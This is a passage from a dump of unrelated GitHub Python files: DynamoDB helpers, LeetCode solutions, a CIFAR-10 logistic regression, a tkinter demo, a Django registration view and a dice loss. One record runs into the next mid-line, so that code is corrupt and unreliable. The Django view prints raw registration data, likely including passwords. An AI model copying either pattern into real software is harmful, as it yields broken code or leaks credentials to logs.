response['ResponseMetadata']['HTTPStatusCode'] == 200\n except ClientError as e:\n print('Failed to put item:', item)\n print('Error:', e.response['Error']['Message'])\n\n def update_item(self, table_name):\n #TODO: Joshua Klassen-implement this function\n return\n\n #TODO: Joshua Klassen-test this\n def batch_write(self, table_name, items):\n \"\"\" Write items in a batch \"\"\"\n if self.table_exists(table_name):\n \n table = self.get_table(table_name)\n with table.batch_writer() as batch:\n for item in items:\n batch.put_item(Item=item)\n return True\n\n def soft_delete_item(self, table_name, key):\n \"\"\"\n Soft delete item with the given key from the given table\n by setting isDeleted = 1\n \"\"\"\n\n table = self.get_table(table_name)\n response = table.update_item(\n Key={\n 'id': key\n },\n UpdateExpression='SET deleted = :softDelete',\n ExpressionAttributeValues={\n ':softDelete': 1\n }\n )\n return response['ResponseMetadata']['HTTPStatusCode'] == 200\n\n def delete_item(self, table_name, key):\n \"\"\" Delete item with the given key from the given table \"\"\"\n table = self.get_table(table_name)\n response = table.delete_item(\n Key={'id': key}\n )\n return response['ResponseMetadata']['HTTPStatusCode'] == 200\n\n def scan(self, table_name):\n \"\"\" \n Scans the entire database \n This is a costly action, use carefully\n \"\"\"\n\n if self.table_exists(table_name):\n response = self.get_table(table_name).scan()\n\n return response.get('Items')\n\n def get_max_primarykey(self, table_name):\n table = self.get_table(table_name)\n\n response = table.scan(\n ProjectionExpression=\"#id\",\n ExpressionAttributeNames={ \"#id\": \"id\", }\n )\n\n MaxValue = 0\n for item in response['Items']:\n key = item['id']\n MaxValue = max(key, MaxValue)\n\n return MaxValue + 1\n\n def dynamodbItem_to_string(self, item):\n \"\"\" Convert an item from .get_item() to a string \"\"\"\n return json.dumps(item, indent=4, cls=DecimalEncoder)\n\n def get_item_as_string(self, table_name, key):\n \"\"\" Wraps .get_item() to return a string \"\"\"\n return self.dynamodbItem_to_string(self.get_item(table_name, key))\n\n #TODO: Joshua Klassen: determine if this should be the default behaviour\n def get_item_as_json(self, table_name, key):\n \"\"\" Wraps .get_item() to return a json object \"\"\"\n return json.loads(self.get_item_as_string(table_name, key))\n\n #TODO: Joshua Klassen: determine if this should be the default behaviour\n def scan_as_json(self, table_name):\n items = self.scan(table_name)\n response = []\n for item in items:\n response.append(json.loads(json.dumps(item, cls=DecimalEncoder)))\n \n return response\n\n def scan_as_json_with_criteria(self, table_name, column, value):\n items = self.scan(table_name)\n response = []\n for item in items:\n if column in item and item[column] == value:\n response.append(json.loads(json.dumps(item, cls=DecimalEncoder)))\n return response","repo_name":"KieranL/Chow-Me-In","sub_path":"server/chowmein/database/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"70926700962","text":"class TrieNode:\n def __init__(self):\n self.children = {}\n self.is_word = False\n def construct(words):\n root = TrieNode()\n for word in words:\n curr = root\n for c in word:\n if c not in curr.children:\n curr.children[c] = TrieNode()\n curr = curr.children[c]\n curr.is_word = True\n \n return root\n \n \nclass Solution:\n def indexPairs(self, text: str, words: List[str]) -> List[List[int]]:\n root = TrieNode.construct(words)\n \n res = []\n for i in range(len(text)):\n curr = root\n \n for j in range(i, len(text)):\n if text[j] in curr.children:\n curr = curr.children[text[j]]\n else:\n break\n if curr.is_word:\n res.append([i,j])\n \n return res\n \n ","repo_name":"hogilkim/leetcode","sub_path":"1065. Index Pairs of a String.py","file_name":"1065. Index Pairs of a String.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16372656742","text":"a=input()\nn=len(a)\n\nfor i in range(1< int:\n\n # monotonic stack solution\n result = 0\n nums = [float('inf')] + nums + [float('inf')]\n stack = [0]\n for i in range(len(nums)):\n while nums[stack[-1]] < nums[i]:\n idx = stack.pop()\n result += nums[idx] * (i-idx) * (idx-stack[-1])\n stack.append(i)\n nums[0], nums[-1] = -float('inf'), -float('inf')\n stack = [0]\n for i in range(len(nums)):\n while nums[stack[-1]] > nums[i]:\n idx = stack.pop()\n result -= nums[idx] * (i-idx) * (idx-stack[-1])\n stack.append(i)\n return result\n\n # brute force O(n**2)\n #\n # result = 0\n # for left in range(len(nums) - 1):\n # mn = mx = nums[left]\n # for right in range(left + 1, len(nums)):\n # num = nums[right]\n # if num < mn:\n # mn = num\n # if num > mx:\n # mx = num\n # result += (mx - mn)\n # return result\n\n # little optimized but still O(n**2)\n #\n # result = 0\n # max_right = len(nums)\n # fast = False\n # mn = mx = 0\n # for left in range(len(nums) - 1):\n # cur_mn = cur_mx = nums[left]\n # mn_idx = mx_idx = left\n # if fast and left > min_right:\n # fast = False\n # max_right = len(nums)\n # if fast:\n # result += (len(nums) - max_right) * (mx - mn)\n # for right in range(left + 1, max_right):\n # num = nums[right]\n # if num < cur_mn:\n # cur_mn = num\n # mn_idx = right\n # if num > cur_mx:\n # cur_mx = num\n # mx_idx = right\n # result += (cur_mx - cur_mn)\n # if not fast:\n # fast = True\n # mn = cur_mn\n # mx = cur_mx\n # max_right = max(mn_idx, mx_idx)\n # min_right = min(mn_idx, mx_idx)\n # return result\n\n\n\nstart_time = time()\n\n# Input: nums = [1,2,3]\n# Output: 4\n# Explanation: The 6 subarrays of nums are the following:\n# [1], range = largest - smallest = 1 - 1 = 0\n# [2], range = 2 - 2 = 0\n# [3], range = 3 - 3 = 0\n# [1,2], range = 2 - 1 = 1\n# [2,3], range = 3 - 2 = 1\n# [1,2,3], range = 3 - 1 = 2\n# So the sum of all ranges is 0 + 0 + 0 + 1 + 1 + 2 = 4.\n\n_nums = [4, -2, -3, 4, 1]\n# Input: nums = [4,-2,-3,4,1]\n# Output: 59\n# Explanation: The sum of all subarray ranges of nums is 59.\n\nprint(Solution().subArrayRanges(_nums))\n\nprint(\"--- %s seconds ---\" % (time() - start_time))\n","repo_name":"Sadomtsevvs/Leetcode","sub_path":"2104. Sum of Subarray Ranges.py","file_name":"2104. Sum of Subarray Ranges.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"169011470","text":"import pygame\nfrom system_files.save.save import SAVE\n\npygame.init()\n\nscreen= pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\nWINDOW_WIDTH, WINDOW_HEIGHT = screen.get_size()\nclock = pygame.time.Clock()\npygame.display.set_caption('Title')\nicon = pygame.image.load(\"system_files\\\\sprite\\\\icon.ico\")\npygame.display.set_icon(icon)\nRUNNING=1\nwidth = 1920\nheight = 1080\n\nSCREENING = pygame.image.load(\"system_files\\\\sprite\\\\scr.png\")\nSCREEN_TOLERANCE = 10\n\n#saved data for cross communication\n\ndata={\n \"WINDOW_HEIGHT\" : WINDOW_HEIGHT,\n \"WINDOW_WIDTH\" : WINDOW_WIDTH,\n \"STATE\" : \"PROGRAM\",\n \"SCREEN\" : 100\n}\nSAVE(\"\",data,\"cross.txt\")\n","repo_name":"Vengeful-Pancake/Cap","sub_path":"system_files/initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27143820243","text":"a = int(input())\nb = int(input())\nc = list(map(int, input().split()))\nc = sorted(c, reverse=True)\nres = 0\nfor i in range(b):\n if(a <= 1):\n break\n while(True):\n if(a < int(c[i])):\n break\n res = res + a / int(c[i])\n a = a / int(c[i])\nprint(res)","repo_name":"HwangHunJo/solved.ac","sub_path":"class1+/엄청난 부자.py","file_name":"엄청난 부자.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40158979115","text":"import argparse\nimport logging\nimport os\nimport json\nfrom tqdm import tqdm\nfrom utils import (\n evaluate\n)\nfrom src.biosyn import (\n DictionaryDataset,\n QueryDataset,\n BioSyn\n)\nLOGGER = logging.getLogger()\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='BioSyn evaluation')\n\n # Required\n parser.add_argument('--model_name_or_path', required=True, help='Directory for model')\n parser.add_argument('--dictionary_path', type=str, required=True, help='dictionary path')\n parser.add_argument('--data_dir', type=str, required=True, help='data set to evaluate')\n\n # Run settings\n parser.add_argument('--use_cuda', action=\"store_true\")\n parser.add_argument('--topk', type=int, default=20)\n parser.add_argument('--score_mode', type=str, default='hybrid', choices=['hybrid','dense','sparse'])\n parser.add_argument('--output_dir', type=str, default='./output/', help='Directory for output')\n parser.add_argument('--filter_composite', action=\"store_true\", help=\"filter out composite mention queries\")\n parser.add_argument('--filter_duplicate', action=\"store_true\", help=\"filter out duplicate queries\")\n parser.add_argument('--save_predictions', action=\"store_true\", help=\"whether to save predictions\")\n\n # Tokenizer settings\n parser.add_argument('--max_length', default=25, type=int)\n \n args = parser.parse_args()\n return args\n \ndef init_logging():\n LOGGER.setLevel(logging.INFO)\n fmt = logging.Formatter('%(asctime)s: [ %(message)s ]',\n '%m/%d/%Y %I:%M:%S %p')\n console = logging.StreamHandler()\n console.setFormatter(fmt)\n LOGGER.addHandler(console)\n\ndef load_dictionary(dictionary_path): \n dictionary = DictionaryDataset(\n dictionary_path = dictionary_path\n )\n return dictionary.data\n\ndef load_queries(data_dir, filter_composite, filter_duplicate):\n dataset = QueryDataset(\n data_dir=data_dir,\n filter_composite=filter_composite,\n filter_duplicate=filter_duplicate\n )\n return dataset.data\n \ndef main(args):\n init_logging()\n print(args)\n\n # load dictionary and data\n eval_dictionary = load_dictionary(dictionary_path=args.dictionary_path)\n eval_queries = load_queries(\n data_dir=args.data_dir,\n filter_composite=args.filter_composite,\n filter_duplicate=args.filter_duplicate\n )\n\n biosyn = BioSyn(\n max_length=args.max_length,\n use_cuda=args.use_cuda\n )\n biosyn.load_model(\n model_name_or_path=args.model_name_or_path,\n )\n \n result_evalset = evaluate(\n biosyn=biosyn,\n eval_dictionary=eval_dictionary,\n eval_queries=eval_queries,\n topk=args.topk,\n score_mode=args.score_mode\n )\n \n LOGGER.info(\"acc@1={}\".format(result_evalset['acc1']))\n LOGGER.info(\"acc@5={}\".format(result_evalset['acc5']))\n \n if args.save_predictions:\n output_file = os.path.join(args.output_dir,\"predictions_eval.json\")\n with open(output_file, 'w') as f:\n json.dump(result_evalset, f, indent=2)\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","repo_name":"dmis-lab/BioSyn","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"54"} +{"seq_id":"7606264290","text":"import os\nimport random\nfrom collections import deque\nfrom typing import List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\nfrom PIL import Image\nfrom sklearn.manifold import TSNE\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom tqdm import tqdm\n\nfrom image_recognition import cifar_dir\n\n\ndef generate_subset_indices_pair(\n dataset: Dataset, ratio: float, random_seed: int = 0\n) -> Tuple[List[int], List[int]]:\n \"\"\"データセットを2分割するインデックスを格納した2つのリストを返す。\n\n Args:\n dataset (Dataset): 2つに分割するデータセット\n ratio (float): 分割した最初のセットに含めるデータ数を示す割合\n random_seed: データセットをランダムに分割するための乱数を生成するシード値\n Returns:\n Tuple[List[int], List[int]]: それぞれ2つのサブセットに含めるデータセットに含まれるデータ\n のインデックスを格納したタプル\n \"\"\"\n # サブセットの大きさを計算\n size = int(len(dataset) * ratio)\n indices = list(range(len(dataset)))\n # 二つのセットに分ける前にシャッフル\n random.seed(random_seed)\n random.shuffle(indices)\n # セット1とセット2のサンプルのインデックスに分割\n indices1, indices2 = indices[:size], indices[size:]\n return indices1, indices2\n\n\ndef transform(\n image: Image.Image, channel_mean: np.ndarray = None, channel_std: np.ndarray = None\n) -> np.ndarray:\n \"\"\"画像を正規化する。\n\n Args:\n image (Image.Image): 正規化する画像\n channel_mean (np.ndarray): 各次元のデータセット全体の平均(入力次元)\n channel_std (np.ndarray): 各次元のデータセット全体の標準偏差(入力次元)\n Returns:\n np.ndarray: 正規化された画像\n \"\"\"\n # 画像をNumPy配列に変換\n # img.shape: (32, 32, 3)\n image = np.asarray(image, dtype=\"float32\")\n # (32, 32. 3)の画像を3072次元のベクトルに変換\n # 3072 = 32 * 32 * 3\n x = image.flatten()\n # 各次元をデータセット全体の平均と標準偏差で正規化\n if channel_mean is not None and channel_std is not None:\n x = (x - channel_mean) / channel_std\n return x\n\n\ndef calculate_dataset_statistics(dataset: Dataset) -> Tuple[float, float]:\n \"\"\"各次元のデータセット全体の平均と標準偏差を計算する。\n\n Args:\n dataset (Dataset): 平均と標準偏差を計算するデータセット\n Returns:\n Tuple[float, float]: 平均と標準偏差\n \"\"\"\n data = []\n for i in range(len(dataset)):\n img_flat = dataset[i][0]\n data.append(img_flat)\n # print(\"data[0].shape: \", data[0].shape) # (3072,)\n # 第0軸を追加して、第0軸でデータを連結\n data = np.stack(data)\n # print(f\"data.shape: {data.shape}\") # (50000, 3072)\n channel_mean = np.mean(data, axis=0)\n channel_std = np.std(data, axis=0)\n # print(f\"channel_mean.shape: {channel_mean.shape}\") # (3072,)\n # print(f\"channel_std.shape: {channel_std.shape}\") # (3072,)\n return channel_mean, channel_std\n\n\ndef target_transform(label: int, num_classes: int = 10) -> np.ndarray:\n \"\"\"ラベルをone-hotベクトルに変換する。\n\n Args:\n label (int): one-hotベクトルに変換するラベル\n num_classes (int): ラベルの数\n Returns:\n np.ndarray: one-hotベクトル\n \"\"\"\n # 数字 -> one-hotベクトル\n y = np.identity(num_classes)[label]\n # print(f\"y.shape: {y.shape}\")\n return y\n\n\nclass MultiClassLogisticRegression:\n \"\"\"多クラスロジスティック回帰モデル\"\"\"\n\n def __init__(self, dim_input: int, num_classes: int) -> None:\n \"\"\"イニシャライザ\n\n Args:\n dim_input (int): 入力次元数\n num_classes (int): 分類対象の物体クラスの数\n \"\"\"\n # パラメータをランダムに初期化\n self.weight = np.random.normal(scale=0.01, size=(dim_input, num_classes))\n self.bias = np.zeros(num_classes)\n # print(f\"weight.shape: {self.weight.shape}\") (3072, 10)\n # print(f\"bias.shape: {self.bias.shape}\") # (10,)\n\n def _softmax(self, x: np.ndarray) -> np.ndarray:\n \"\"\"ソフトマックス関数\n\n Args:\n x (np.ndarray): ソフトマックス関数の入力\n Returns:\n np.ndarray: ソフトマックス関数の出力\n \"\"\"\n return np.exp(x) / np.sum(np.exp(x), axis=1, keepdims=True)\n\n def predict(self, x: np.ndarray) -> np.ndarray:\n \"\"\"物体クラスの確立を予測する。\n\n Args:\n x (np.ndarray): 入力データ(バッチサイズ, 入力次元)\n Returns:\n np.ndarray: 物体クラスの確率(バッチサイズ, 物体クラスの数)\n \"\"\"\n y = np.matmul(x, self.weight) + self.bias\n y = self._softmax(y)\n # print(f\"y.shape: {y.shape}\")\n\n return y\n\n def update_parameters(\n self, x: np.array, y: np.ndarray, y_pred: np.ndarray, lr: float = 0.001\n ):\n # 出力と正解の誤差を計算\n diffs = y_pred - y\n # 勾配を使用してパラメーターを更新\n self.weight -= lr * np.mean(x[:, :, np.newaxis] * diffs[:, np.newaxis], axis=0)\n self.bias -= lr * np.mean(diffs, axis=0)\n\n def copy(self):\n \"\"\"モデルを複製する。\"\"\"\n # model_copy = self.__class__(*self.weight.shape)\n model_copy = MultiClassLogisticRegression(*self.weight.shape)\n model_copy.weight = self.weight.copy()\n model_copy.bias = self.bias.copy()\n return model_copy\n\n\nclass Config:\n \"\"\"ハイパーパラメーターとオプション\"\"\"\n\n def __init__(self) -> None:\n self.val_ratio = 0.2 # 検証に使う学習セット内のデータの割合\n self.num_epochs = 30 # 学習エポック数\n self.lrs = [1e-2, 1e-3, 1e-4] # 検証する学習率\n self.moving_avg = 20 # 移動平均で計算する損失と正確度の値の数\n self.batch_size = 32 # バッチサイズ\n self.num_workers = 2 # データローダーに使うCPUプロセスの数\n\n\nclass ImageTransformer:\n def __init__(self, channel_mean: float, channel_std: float) -> None:\n self.channel_mean = channel_mean\n self.channel_std = channel_std\n\n def __call__(self, image: Image.Image) -> np.ndarray:\n return transform(image, self.channel_mean, self.channel_std)\n\n\ndef evaluate_train_dataset():\n config = Config()\n # 入力データ正規化のために学習セットのデータを使って\n # 各次元の平均と標準偏差を計算\n dataset = torchvision.datasets.CIFAR10(\n root=cifar_dir(), train=True, download=True, transform=transform\n )\n channel_mean, channel_std = calculate_dataset_statistics(dataset)\n\n # 正規化を含めた画像整形関数の用意\n # img_transform = lambda x: transform(x, channel_mean, channel_std)\n # pickleでモデルを保存するため、lambda式を使用できないためコメントアウト\n # 代わりにImageTransformerクラスを定義して使用\n # img_transform = img_transform_wrapper(channel_mean, channel_std)\n\n # 学習、評価セットの用意\n train_dataset = torchvision.datasets.CIFAR10(\n root=cifar_dir(),\n train=True,\n download=True,\n # transform=img_transform,\n transform=ImageTransformer(channel_mean, channel_std),\n target_transform=target_transform,\n )\n test_dataset = torchvision.datasets.CIFAR10(\n root=cifar_dir(),\n train=False,\n download=True,\n # transform=img_transform,\n transform=ImageTransformer(channel_mean, channel_std),\n target_transform=target_transform,\n )\n # 学習・検証セットへ分割するためのインデックス集合の生成\n val_set, train_set = generate_subset_indices_pair(train_dataset, config.val_ratio)\n print(f\"学習セットのサンプル数: {len(train_set)}\") # 40000\n print(f\"検証セットのサンプル数: {len(val_set)}\") # 10000\n print(f\"テストセットのサンプル数: {len(test_dataset)}\") # 10000\n\n # インデックス集合から無作為にインデックスをサンプルするサンプラー\n train_sampler = SubsetRandomSampler(train_set)\n # DataLoaderを生成\n train_loader = DataLoader(\n train_dataset,\n batch_size=config.batch_size,\n num_workers=config.num_workers,\n sampler=train_sampler,\n )\n val_loader = DataLoader(\n train_dataset,\n batch_size=config.batch_size,\n num_workers=config.num_workers,\n sampler=val_set,\n )\n test_loader = DataLoader(\n test_dataset, batch_size=config.batch_size, num_workers=config.num_workers\n )\n\n # 検証セットの結果による最良モデルの保存用変数\n val_loss_best = float(\"inf\")\n model_best = None\n for lr in config.lrs:\n # 多クラスロジスティック回帰モデルの生成\n print(f\"学習率: {lr}\") # 0.01, 0.001, 0.0001\n model = MultiClassLogisticRegression(32 * 32 * 3, len(train_dataset.classes))\n for epoch in range(config.num_epochs):\n with tqdm(train_loader) as pbar:\n pbar.set_description(f\"[エポック {epoch + 1}]\")\n # 移動平均計算用\n losses = deque()\n accuracies = deque()\n for x, y in pbar:\n # サンプルしたデータはPyTorchのTensorに\n # 変換されているのためNumPyデータに戻す\n x = x.numpy()\n y = y.numpy()\n y_pred = model.predict(x)\n # 学習データに対する目的関数と正確度を計算\n loss = np.mean(np.sum(-y * np.log(y_pred), axis=1))\n # Maxのインデックスは数字表現のクラスラベル\n accuracy = np.mean(\n np.argmax(y_pred, axis=1) == np.argmax(y, axis=1)\n )\n # 移動平均を計算して表示\n losses.append(loss)\n accuracies.append(accuracy)\n if len(losses) > config.moving_avg:\n losses.popleft()\n accuracies.popleft()\n pbar.set_postfix(\n {\"loss\": np.mean(losses), \"accuracy\": np.mean(accuracies)}\n )\n # パラメータを更新\n model.update_parameters(x, y, y_pred, lr=lr)\n # 検証セットを使って精度評価\n val_loss, val_accuracy = evaluate(val_loader, model)\n print(f\"検証: loss = {val_loss:.3f}, \" f\"accuracy = {val_accuracy:.3f}\")\n # より良い検証結果が得られた場合、モデルを記録\n if val_loss < val_loss_best:\n val_loss_best = val_loss\n model_best = model.copy()\n # テスト\n test_loss, test_accuracy = evaluate(test_loader, model_best)\n print(f\"テスト: loss = {test_loss:.3f}, \" f\"accuracy = {test_accuracy:.3f}\")\n\n\ndef evaluate(data_loader: DataLoader, model: MultiClassLogisticRegression):\n losses = []\n preds = []\n for x, y in data_loader:\n x = x.numpy()\n y = y.numpy()\n y_pred = model.predict(x)\n losses.append(np.sum(-y * np.log(y_pred), axis=1))\n preds.append(np.argmax(y_pred, axis=1) == np.argmax(y, axis=1))\n loss = np.mean(np.concatenate(losses))\n accuracy = np.mean(np.concatenate(preds))\n return loss, accuracy\n\n\n# `if __name__ == \"__main__\":`を追加\n# この条件を満たすときにのみ、train_eval関数を呼び出さないと、multiprocessingでRuntimeErrorが発生する。\n# RuntimeError:\n# An attempt has been made to start a new process before the\n# current process has finished its bootstrapping phase.\n#\n# This probably means that you are not using fork to start your\n# child processes and you have forgotten to use the proper idiom\n# in the main module:\n#\n# if __name__ == '__main__':\n# freeze_support()\n# ...\n#\n# The \"freeze_support()\" line can be omitted if the program\n# is not going to be frozen to produce an executable.\nif __name__ == \"__main__\":\n evaluate_train_dataset()\n","repo_name":"xjr1300/image_recognition","sub_path":"image_recognition/ch03_01_multi_class_logistic_regression.py","file_name":"ch03_01_multi_class_logistic_regression.py","file_ext":"py","file_size_in_byte":12688,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31711994382","text":"\"\"\"\nModification from\nhttps://note.nkmk.me/en/python-pillow-concat-images/\n\"\"\"\nfrom PIL import Image\n\n\n# For Visulaization of cutouts\ndef get_concat_h_multi_resize(im_list, resample=Image.BICUBIC):\n\t\"\"\"\n\tconcat PIL images horizontally\n\n\t:param im_list: image array list\n\t:param resample: Image.BICUBIC\n\t:return: horizontally concatenated PIL Image\n\t\"\"\"\n\tmin_height = min(Image.fromarray(im).height for im in im_list)\n\tim_list_resize = [Image.fromarray(im).resize(\n\t\t(int(Image.fromarray(im).width * min_height / Image.fromarray(im).height), min_height), resample=resample)\n\t\tfor im in im_list]\n\ttotal_width = sum(im.width for im in im_list_resize)\n\tdst = Image.new('RGB', (total_width, min_height))\n\tpos_x = 0\n\tfor im in im_list_resize:\n\t\tdst.paste(im, (pos_x, 0))\n\t\tpos_x += im.width\n\treturn dst\n\n\ndef get_concat_v_multi_resize(im_list, resample=Image.BICUBIC):\n\t\"\"\"\n\tconcat PIL images Vertically\n\n\t:param im_list: image array list\n\t:param resample: Image.BICUBIC\n\t:return: Vertically concatenated PIL Image\n\t\"\"\"\n\tmin_width = min(im.width for im in im_list)\n\tim_list_resize = [im.resize((min_width, int(im.height * min_width / im.width)), resample=resample)\n\t for im in im_list]\n\ttotal_height = sum(im.height for im in im_list_resize)\n\tdst = Image.new('RGB', (min_width, total_height))\n\tpos_y = 0\n\tfor im in im_list_resize:\n\t\tdst.paste(im, (0, pos_y))\n\t\tpos_y += im.height\n\treturn dst","repo_name":"kimdanny/Deep-Learning-cw","sub_path":"task2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28544672778","text":"from tkinter.ttk import *\nfrom tkinter import *\nfrom tkinter import scrolledtext\nfrom tkinter import messagebox\nroot = Tk()\nroot.geometry('1000x1000')\nroot.title('Documentation')\nroot.iconbitmap('/home/bc2113449/projects/MadLibs/hyd.gif')\n#######################WIDGETS################################\n#----label\nl1=Label(root, text= 'Hello world!' , font = 'arial 30 bold')\nl1.grid(row=0,column=0)\n#----button\nb1=Button(root,text=\"Submit\")\nb1.grid(row=0,column=1)\n#----we can also add button click event\ndef clicked():\n b2.configure(text=\"You clicked on enter!!\")\nb2=Button(root,text=\"Enter\",bg=\"red\",fg=\"white\",command=clicked,padx=50,pady=50)\nb2.grid(row=0,column=3)\n#----Entry(used to take input from user)\nl7=Label(root, text= 'Entry class' , font = 'arial 10 bold')\nl7.grid(row=1,column=0)\ntxt=Entry(root,width=20) ## we can also add the fg,bg colour and borderwidth\ntxt.insert(1,\"Enter your name\")\ntxt.grid(row=1,column=1)\ndef clicked():\n res=\"Welcome \"+txt.get()\n b3.configure(text=res)\nb3=Button(root,text=\"Click here to see magic\",bg=\"red\",fg=\"white\",command=clicked)\nb3.grid(row=1,column=2)\n#---- Combobox(dropdown box)\nl6=Label(root, text= 'Combobox' , font = 'arial 10 bold')\nl6.grid(row=2,column=0)\ncombo=Combobox(root)\ncombo['values']=(\"india\",\"pak\",\"bangladesh\",\"srilanka\")\ncombo.current(0)\ncombo.grid(row=2,column=1)\n#----Check button \nl5=Label(root, text= 'Check boxes' , font = 'arial 10 bold')\nl5.grid(row=3,column=0)\nchk_state=BooleanVar() #here BooleanVar() is tkinter variable not the python variable\nchk_state.set(True)\nc1=Checkbutton(root,text=\"I have read all the conditions\",var=chk_state)\nc1.grid(row=3,column=1)\n#----Radio button;\nl4=Label(root, text= 'RadioButtons' , font = 'arial 10 bold')\nl4.grid(row=4,column=0)\nrad1 = Radiobutton(root,text=\"Python\",value=1)\nrad2 = Radiobutton(root,text=\"Java\",value=2)\nrad3 = Radiobutton(root,text=\"Scalar\",value=3)\nrad1.grid(column=1,row=4)\nrad2.grid(column=2,row=4)\nrad3.grid(column=3,row=4)\n#----ScrolledText\nl4=Label(root, text= 'Scrolled text' , font = 'arial 10 bold')\nl4.grid(row=5,column=0)\nstxt=scrolledtext.ScrolledText(root,width=20,height=10)\nstxt.insert(INSERT,\"____________________\")\nstxt.insert(INSERT,\"Enter your text here\")\nstxt.insert(INSERT,\"____________________\")\nstxt.grid(row=5,column=1)\n#----MessageBox\nl3=Label(root, text= 'MessageInfo' , font = 'arial 10 bold')\nl3.grid(row=6,column=0)\ndef clicked1():\n messagebox.showinfo('Message title',\"Message content\")\nb4=Button(root,text=\"click here for message\",command=clicked1)\nb4.grid(row=6,column=1)\n#----Spinbox\nl2=Label(root, text= 'Spinbox' , font = 'arial 10 bold')\nl2.grid(row=7,column=0)\nspin=Spinbox(root,from_=0,to_=20,width=5)\nspin.grid(row=7,column=1)\n\n##########Geometry Manager Classes\n# 1.pack()--organizes the widgets in block,occupies the entire width\n# 2.grid()--organizes the widgets in table like structure\n# 3.place()--organizes the widgets at specific position that we want\nLabel(root,text=\"Username\").grid(row=8)\nEntry(root).grid(row=8,column=1)\nLabel(root,text=\"Password\").grid(row=9)\nEntry(root).grid(row=9,column=1)\nCheckbutton()\nchk_state2=BooleanVar() #here BooleanVar() is tkinter variable not the python variable\nchk_state2.set(False)\nCheckbutton(root,text=\"Keep me logged in\",var=chk_state2).grid(row=10,column=1)\n#----Binding Function(calling functions whenever an event occur refers to binding fucntion)\n#----Event Handling\n# 1.--left click\n# 2.--middle click\n# 3.--Right click\nl8=Label(root, text= 'EventHandling' , font = 'arial 10 bold')\nl8.grid(row=11,column=0)\ni = 1\ndef click2(event):\n global i\n Label(root,text=\"Hi Akshith\").grid(row=12,column=i)\n i = i + 1\nbt = Button(root, text=\"click here for event handling\")\nbt.bind(\"\", click2) # to bind the button widget to event handler\nbt.grid(row=11, column=1) # Use grid instead of pack to place the button\n#----PhotoImage\nicon=PhotoImage(file=\"/home/bc2113449/projects/MadLibs/hyd.gif\")\nl9=Label(root, text= 'PhotoImage',font = 'arial 10 bold')\nl9.grid(row=13,column=0)\nLabel(root,image=icon).grid(row=13,column=1)\n\n\n\nroot.mainloop()\n\n","repo_name":"DamarlaAkshith/MadLibs","sub_path":"tkinter_demo.py","file_name":"tkinter_demo.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26548517924","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom account.api.serializers import RegistrationSerializer\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import api_view, permission_classes,authentication_classes\n\n# Register\n\n# Url: https:///api/register\n\n@api_view(['POST',])\n@csrf_exempt\n@authentication_classes([])\n@permission_classes([])\ndef userregister(request):\n print(\"hello\")\n print(\"hello\",request.method)\n if request.method == 'POST':\n serializer = RegistrationSerializer(data=request.data)\n data = {}\n print(\"hiiii\")\n print(request.data)\n print(serializer)\n if serializer.is_valid():\n print(\"valid\")\n account = serializer.save()\n data['response'] = 'successfully registered new user.'\n data['email'] = account.email\n data['name'] = account.name\n data['contact_number'] = account.contact_number\n\n token = Token.objects.get(user=account).key\n\n data['token'] = token\n\n else:\n data = serializer.errors\n\n return Response(data)\n\n","repo_name":"Him2703/redo-backend","sub_path":"account/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17273855288","text":"from typing import Optional\n\nimport torch\n\n\ndef dice_coeff(probabilities: torch.Tensor, labels: torch.Tensor, threshold: Optional[float] = None,\n reduction: Optional[str] = 'mean') -> torch.Tensor:\n \"\"\"Compute a mean hard or soft dice coefficient between a batch of probabilities and target\n labels. Reduction happens over the batch dimension; if None, return dice per example.\n \"\"\"\n # This factor prevents division by 0 if both prediction and GT don't have any foreground voxels\n smooth = 1e-3\n\n if threshold is not None:\n probabilities = probabilities.gt(threshold).float()\n # Flatten all dims except for the batch\n probabilities_flat = torch.flatten(probabilities, start_dim=1)\n labels_flat = torch.flatten(labels, start_dim=1)\n\n intersection = (probabilities_flat * labels_flat).sum(dim=1)\n volume_sum = probabilities_flat.sum(dim=1) + labels_flat.sum(dim=1) # it's not the union!\n dice = (2. * intersection + smooth) / (volume_sum + smooth)\n if reduction == 'mean':\n dice = torch.mean(dice)\n elif reduction == 'sum':\n dice = torch.sum(dice)\n\n return dice\n\n\nclass DiceLoss(torch.nn.Module):\n \"\"\"Takes logits as input.\"\"\"\n def __init__(self, threshold: Optional[float] = None, reduction: Optional[str] = 'mean',\n do_report_metric: bool = False):\n \"\"\"If no threshold is given, soft dice is computed, otherwise the predicted values are\n thresholded. Reduction happens over the batch dimension; if None, return dice per example.\n If 